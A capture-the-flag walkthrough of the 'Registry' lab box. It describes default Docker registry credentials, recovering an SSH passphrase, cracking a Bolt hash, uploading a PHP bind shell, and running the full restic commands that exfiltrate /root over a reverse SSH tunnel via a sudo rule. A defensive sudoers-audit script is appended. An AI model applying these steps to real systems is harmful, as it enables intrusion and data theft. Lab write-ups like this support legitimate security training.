System Summary
Initial Enumeration
Let's fire nmap. The second line of the output gives a hint related to Docker...
But before going down this road, let's use DirBuster, which finds a link related to the Bolt webapp:
Let's now open the main page using the IP address:
Retry using the hostname docker.registry.htb:
Mmmmh, another site...
Let's try with http://docker.registry.htb/v2
We get a login page for Docker, and using admin:admin we can get in:
Initial Foothold & user flag
OK, it seems we can get something, but here we need to do some guessing... is there any interesting Docker image? Let's look with docker commands:
We can login with admin:admin
We can guess the name of the Docker image (I rooted the box four months ago and didn't take enough notes: there might be a hint somewhere, but I don't remember)
The name of the image is bolt-image
We can get it with docker pull
List the image with the ID
And run it:
And we're inside a local copy of the Docker image
The .ssh folder contains a pair of SSH keys (public + private)
But the private part of the key is encrypted
Let's look at other files: /etc/profile.d/01-ssh.sh contains the passphrase for the SSH key
The passphrase for id_rsa is: GkOcz221Ftb3ugog
We can also get the user flag: ytc0ytdmnzywnzgxngi0zte0otm3ywzi
Root Flag
There are two virtual hosts:
If we look in /var/www/html/bolt we find a SQLite database belonging to the Bolt webapp
We can open the file, dump the table names and get the user information from the bolt_users table:
We can brute-force the hash of the admin user with hashcat and the rockyou wordlist
Which in a few seconds gives a password: strawberry
And we can get into the Bolt webapp.
We're admin, and there is a section where we can upload files (it needs some additional configuration).
Let's upload a PHP file that executes commands.
First try with a ping back to our machine:
Once we get it working (easy), we can go for a much more interesting PHP bind shell:
Why a bind shell? Because outbound connections are blocked! (keep this in mind for the root escalation)
So we're in as www-data:
The next step is to look for sudo permissions, and we see that www-data can run a restic command with no password
Restic is a backup tool
The next steps require a bit of restic study
We have to prepare a restic repo somewhere (/tmp/rest) using an access password of "pippo":
$ export RESTIC_PASSWORD=pippo
$ restic init --repo /tmp/rest
Then we have to save the password in a file and use sudo to run restic and create a backup of /root:
$ echo pippo > /tmp/.pass
$ cd /tmp
$ sudo /usr/bin/restic backup -r rest/ --password-file /tmp/.pass /root
scan [/root]
[0:00] 10 directories, 14 files, 28.066 KiB
scanned 10 directories, 14 files in 0:00
[0:00] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items
0 errors ETA 0:00
duration: 0:00
snapshot 7579ed40 saved
Unfortunately this creates a snapshot in /tmp/rest, but the backup data is only accessible by the root user on the box. Therefore it's not usable.
We have an alternative: prepare a restic repository on our machine and push the backup to it. But how? Outbound connections from the server are not permitted, after all...
We can use a reverse SSH tunnel to map port 8000 on the registry box to port 8000 on our machine, so 127.0.0.1:8000 on registry will correspond to port 8000 on our machine.
Then we have to download and set up a simple rest-server (https://github.com/restic/rest-server) and run it on port 8000.
Then prepare the "remote" repo through the tunnel:
$ restic init -r rest:http://127.0.0.1:8000/
created restic repository 23acaadb0f at rest:http://127.0.0.1:8000/
Please note that knowledge of your password is required to access the repository. Losing your password means that your data is irrecoverably lost.
Next, create the backup through the tunnel:
$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000/ --password-file /tmp/.pass /root
scan [/root]
[0:00] 10 directories, 14 files, 28.066 KiB
scanned 10 directories, 14 files in 0:00
[0:00] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items
0 errors ETA 0:00
duration: 0:00
snapshot 32707dcd saved
And now we have the snapshot on our machine.
We can restore it into /tmp/restore
Now we have a backup copy of /root
And we can get the root flag
Additionally we can also grab root's id_rsa and get a shell
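The root step works because the sudo rule names /usr/bin/restic with no argument restriction, so sudo accepts any repository target, including one reached over a tunnel. As an added example (not part of the original writeup or of restic), here is a small audit that parses sudoers-style lines and flags rules which hand a file-reading tool to a user with unconstrained arguments; the sample rules are constructed, and only the first mirrors the rule found on the box.

```python
"""Audit sudoers-style user specifications for rules whose arguments are not pinned.
In sudoers a bare path allows ANY arguments, '""' allows none, and explicit
arguments must match exactly (wildcards reopen the rule)."""
import re
from typing import Dict, List

# Constructed sample (not the box's real /etc/sudoers): line 2 mirrors the weak
# rule abused above; line 3 is a tightened variant that pins repo, password and path.
SAMPLE_SUDOERS = """\
Defaults env_reset
www-data ALL=(root) NOPASSWD: /usr/bin/restic
backup   ALL=(root) NOPASSWD: /usr/bin/restic backup -r /srv/restic-repo --password-file /etc/restic.pass /root
alice    ALL=(ALL) /usr/bin/systemctl restart nginx
bob      ALL=(ALL) NOPASSWD: /usr/bin/apt *
"""

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)
SKIP_PREFIXES = ("#", "Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_rules(text: str) -> List[Dict[str, object]]:
    """Return one dict per user-specification line; comments, Defaults and aliases are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if m:
            d = m.groupdict()
            d["tags"] = d["tags"].replace(":", "").split()   # e.g. ["NOPASSWD"]
            rules.append(d)
    return rules


def argument_constraint(cmd: str) -> str:
    """Classify a single command spec: any-args | no-args | wildcard-args | fixed-args."""
    parts = cmd.split()
    if len(parts) == 1:
        return "any-args"
    if parts[1:] == ['""']:
        return "no-args"
    if any("*" in p or "?" in p for p in parts[1:]):
        return "wildcard-args"
    return "fixed-args"


def audit(text: str) -> List[Dict[str, str]]:
    """Flag root-level rules whose arguments the user controls; NOPASSWD raises severity."""
    findings = []
    for r in parse_rules(text):
        runas = (r["runas"] or "root").split(",")
        as_root = any(x.strip() in ("root", "ALL") for x in runas)
        for cmd in str(r["cmd"]).split(","):
            constraint = argument_constraint(cmd.strip())
            if as_root and constraint in ("any-args", "wildcard-args"):
                findings.append({"user": str(r["user"]), "binary": cmd.split()[0],
                                 "constraint": constraint,
                                 "severity": "high" if "NOPASSWD" in r["tags"] else "medium"})
    return findings
```

Pinning the arguments (as in the third sample rule) stops the operator from redirecting the backup to a repository they control; egress filtering alone did not, since the tunnel made the remote rest-server look local.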